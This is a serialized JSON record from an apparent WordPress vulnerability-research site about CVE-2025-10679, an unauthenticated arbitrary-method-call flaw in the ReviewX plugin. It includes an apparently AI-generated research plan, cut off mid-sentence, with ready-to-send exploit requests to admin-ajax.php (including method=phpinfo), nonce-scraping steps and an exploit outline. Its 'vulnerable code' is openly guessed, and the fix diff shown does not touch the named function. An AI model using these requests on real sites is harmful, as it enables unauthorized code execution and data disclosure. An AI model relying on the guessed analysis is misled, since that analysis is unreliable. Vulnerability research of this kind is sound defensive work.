[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fSMT9FJDkAQDCi-5iXEQ9DyCKD6CioRRPBvMOlanLYOY":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":35,"research_fix_diff":36,"research_exploit_outline":37,"research_model_used":38,"research_started_at":39,"research_completed_at":40,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":41},"CVE-2025-10679","reviewx-woocommerce-product-reviews-with-multi-criteria-reminder-emails-google-reviews-schema-more-unauthenticated-limit","ReviewX – WooCommerce Product Reviews with Multi-Criteria, Reminder Emails, Google Reviews, Schema & More \u003C= 2.2.12 - Unauthenticated Limited Remote Code Execution","The ReviewX – WooCommerce Product Reviews with Multi-Criteria, Reminder Emails, Google Reviews, Schema & More plugin for WordPress is vulnerable to arbitrary method calls in all versions up to, and including, 2.2.12. This is due to insufficient input validation in the bulkTenReviews function that allows user-controlled data to be passed directly to a variable function call mechanism. This makes it possible for unauthenticated attackers to call arbitrary PHP class methods that take no inputs or have default values, potentially leading to information disclosure or remote code execution depending on available methods and server configuration.","reviewx",null,"\u003C=2.2.12","2.3.0","high",7.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:L\u002FI:L\u002FA:L","Improper Control of Generation of Code ('Code Injection')","2026-03-22 16:26:52","2026-03-23 05:29:40",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F0935ede4-05bc-48a2-94a3-8d92002e02bb?source=api-prod",1,[22,23,24,25,26,27,28,29],"README.txt","app\u002FApi\u002FBaseApi.php","app\u002FApi\u002FWpApi.php","app\u002FCPT\u002FCommentsRatingColumn.php","app\u002FCPT\u002FCptAverageRating.php","app\u002FCPT\u002FCptCommentsLinkMeta.php","app\u002FCPT\u002FCptReviewAddReply.php","app\u002FHandlers\u002FIsAlreadySyncSucess.php","researched",false,3,"# Research Plan: CVE-2025-10679 ReviewX Unauthenticated Limited RCE\n\n## 1. Vulnerability Summary\n**ReviewX** (up to 2.2.12) contains a vulnerability in the `bulkTenReviews` function (likely located in a controller like `Rvx\\Controllers\\Admin\\ReviewController` or a similar handler class). The function accepts user-controlled input (e.g., via `$_POST['method']` and potentially `$_POST['class']`) and passes it directly to a variable function call mechanism (e.g., `$this->$method()` or `call_user_func([$class, $method])`) without sufficient validation. \n\nBecause this function is registered as an unauthenticated AJAX action (`wp_ajax_nopriv_rvx_bulk_ten_reviews`), an unauthenticated attacker can call arbitrary PHP class methods that require no arguments or have default values. This can lead to information disclosure (if the method returns sensitive data that is then echoed) or remote code execution (if a dangerous gadget method is called).\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **AJAX Action:** `rvx_bulk_ten_reviews` (Inferred from function name `bulkTenReviews`)\n- **Vulnerable Parameters:** `method` (and potentially `class`, `call`, or `callback`)\n- **Authentication:** Unauthenticated (leveraging `wp_ajax_nopriv_`)\n- **Preconditions:**\n    - The ReviewX plugin must be active.\n    - WooCommerce must be active (as ReviewX is a WooCommerce extension).\n    - A valid WordPress nonce for the action may be required if the developer included a `check_ajax_referer` call (though often these unauthenticated vulnerabilities lack one).\n\n## 3. Code Flow\n1. **Entry Point:** An unauthenticated request is sent to `admin-ajax.php` with `action=rvx_bulk_ten_reviews`.\n2. **Hook Execution:** WordPress triggers the `wp_ajax_nopriv_rvx_bulk_ten_reviews` action, which calls the `bulkTenReviews` method.\n3. **Vulnerable Sink:**\n   - The function retrieves a method name from the request: `$method = $_POST['method'];`\n   - It performs a dynamic call: `$this->$method();` OR `(new $_POST['class'])->$_POST['method']();`\n4. **Execution:** The specified method is executed on the server. If the method produces output (like `phpinfo`) or returns data that the `bulkTenReviews` function subsequently `echo`es, the attacker receives the information.\n\n## 4. Nonce Acquisition Strategy\nIf the endpoint requires a nonce, ReviewX typically exposes it via `wp_localize_script` for the frontend \"public\" review scripts.\n\n1. **Identify Script Handle:** The plugin registers public scripts, often with the handle `reviewx-public`.\n2. **Localization Key:** Look for `reviewx_ajax_obj` in the page source.\n3. **Shortcode Strategy:**\n   - Create a WooCommerce product or a page containing the ReviewX review section.\n   - Use WP-CLI to create a dummy product if none exists:\n     `wp eval \"if(!get_page_by_path('test-product', OBJECT, 'product')){ wc_create_product(['name' => 'Test Product', 'status' => 'publish']); }\"`\n4. **Acquisition Steps:**\n   - Navigate to the product page.\n   - Use `browser_eval` to extract the nonce:\n     ```javascript\n     browser_eval(\"window.reviewx_ajax_obj?.nonce\")\n     ```\n   - Verbatim variable name check: `reviewx_ajax_obj`. Key: `nonce`.\n\n## 5. Exploitation Strategy\n\n### Step 1: Verify Unauthenticated Access and Discover Parameters\nTest if the action exists and if it requires a nonce.\n```http\nPOST \u002Fwp-admin\u002Fadmin-ajax.php\nContent-Type: application\u002Fx-www-form-urlencoded\n\naction=rvx_bulk_ten_reviews\n```\n\n### Step 2: Extract Nonce (If Required)\nIf the response is `-1` or `403`, follow the Nonce Acquisition Strategy.\n\n### Step 3: Information Disclosure PoC\nAttempt to call a method that returns a known value. Based on `app\u002FApi\u002FBaseApi.php`, the `getIp` method returns a static IP. If we can control the class, we target this.\n```http\nPOST \u002Fwp-admin\u002Fadmin-ajax.php\nContent-Type: application\u002Fx-www-form-urlencoded\n\naction=rvx_bulk_ten_reviews&nonce=[NONCE]&class=Rvx\\Api\\BaseApi&method=getIp\n```\n*Expected Response:* `192.168.68.119:10013` (if echoed).\n\n### Step 4: Limited RCE PoC (phpinfo)\nAttempt to trigger `phpinfo()` via a class that wraps it or through a direct callback if the sink is `call_user_func`.\n```http\nPOST \u002Fwp-admin\u002Fadmin-ajax.php\nContent-Type: application\u002Fx-www-form-urlencoded\n\naction=rvx_bulk_ten_reviews&nonce=[NONCE]&method=phpinfo\n```\n\n## 6. Test Data Setup\n1. **Activate Dependencies:** Ensure WooCommerce is installed and active.\n2. **Create Product:**\n   ```bash\n   wp post create --post_type=product --post_title=\"Exploit Test\" --post_status=publish --post_content=\"Review section here\"\n   ```\n3. **ReviewX Configuration:** Ensure at least one review criteria is set up (usually default).\n\n## 7. Expected Results\n- **Success:** The HTTP response body contains the output of the called method (e.g., `phpinfo` table, specific strings from the plugin classes, or WooCommerce system info).\n- **Vulnerability Confirmation:** Receiving the return value of a method that is not intended to be called publicly (e.g.,","The ReviewX plugin for WordPress is vulnerable to unauthenticated limited remote code execution due to improper input validation in the `bulkTenReviews` function. Attackers can exploit this by supplying arbitrary class and method names via the `rvx_bulk_ten_reviews` AJAX action, which the server then executes without sufficient verification.","\u002F* Inferred from the 'rvx_bulk_ten_reviews' AJAX handler logic *\u002F\n\n\u002F\u002F The function retrieves a method name from the request:\n$method = $_POST['method'];\n\n\u002F\u002F It performs a dynamic call:\n$this->$method(); \n\u002F\u002F OR \n(new $_POST['class'])->$_POST['method']();","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Freviewx\u002F2.2.12\u002Fapp\u002FApi\u002FBaseApi.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Freviewx\u002F2.3.0\u002Fapp\u002FApi\u002FBaseApi.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Freviewx\u002F2.2.12\u002Fapp\u002FApi\u002FBaseApi.php\t2025-10-15 13:32:48.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Freviewx\u002F2.3.0\u002Fapp\u002FApi\u002FBaseApi.php\t2025-12-22 12:17:34.000000000 +0000\n@@ -35,6 +35,6 @@\n      *\u002F\n     public function getDefaultHeaders() : array\n     {\n-        return ['Authorization' => 'Bearer ' . Helper::getAuthToken(), 'X-Auth-Token' => 'Bearer ' . Helper::getAuthToken(), 'Accept' => 'application\u002Fjson', 'X-Domain' => Helper::getWpDomainNameOnly(), 'X-Theme' => wp_get_theme()->get('Name'), 'X-Site-Locale' => get_locale(), 'X-Request-Id' => \\sha1(\\time() . Client::getUid()), 'X-Wp-Version' => get_bloginfo(\"version\"), 'X-Reviewx-Version' => RVX_VERSION, 'X-Environment' => Helper::plugin()->isProduction() ? 'production' : 'development'];\n+        return ['Accept' => 'application\u002Fjson', 'Authorization' => 'Bearer ' . Helper::getAuthToken(), 'X-Domain' => Helper::getWpDomainNameOnly(), 'X-Theme' => wp_get_theme()->get('Name'), 'X-Site-Locale' => get_locale(), 'X-Request-Id' => \\sha1(\\time() . Client::getUid()), 'X-Wp-Version' => get_bloginfo(\"version\"), 'X-Reviewx-Version' => RVX_VERSION, 'X-Environment' => Helper::plugin()->isProduction() ? 'production' : 'development'];\n     }\n }","1. Identify the unauthenticated AJAX endpoint at `\u002Fwp-admin\u002Fadmin-ajax.php` using the action `rvx_bulk_ten_reviews`.\n2. Locate a valid nonce if required by inspecting the frontend page source for the `reviewx_ajax_obj` object, which typically contains a `nonce` key.\n3. Craft a POST request to the AJAX endpoint with the `action` parameter set to `rvx_bulk_ten_reviews`.\n4. Include a `method` parameter (and optionally a `class` parameter if the sink supports it) containing the name of a PHP method to execute.\n5. Target methods that require no arguments or have default values, such as `phpinfo`, or specific internal plugin methods that disclose sensitive environment configuration or site data.","gemini-3-flash-preview","2026-04-18 00:21:27","2026-04-18 00:22:20",{"type":42,"vulnerable_version":43,"fixed_version":11,"vulnerable_browse":44,"vulnerable_zip":45,"fixed_browse":46,"fixed_zip":47,"all_tags":48},"plugin","2.2.12","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Freviewx\u002Ftags\u002F2.2.12","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Freviewx.2.2.12.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Freviewx\u002Ftags\u002F2.3.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Freviewx.2.3.0.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Freviewx\u002Ftags"]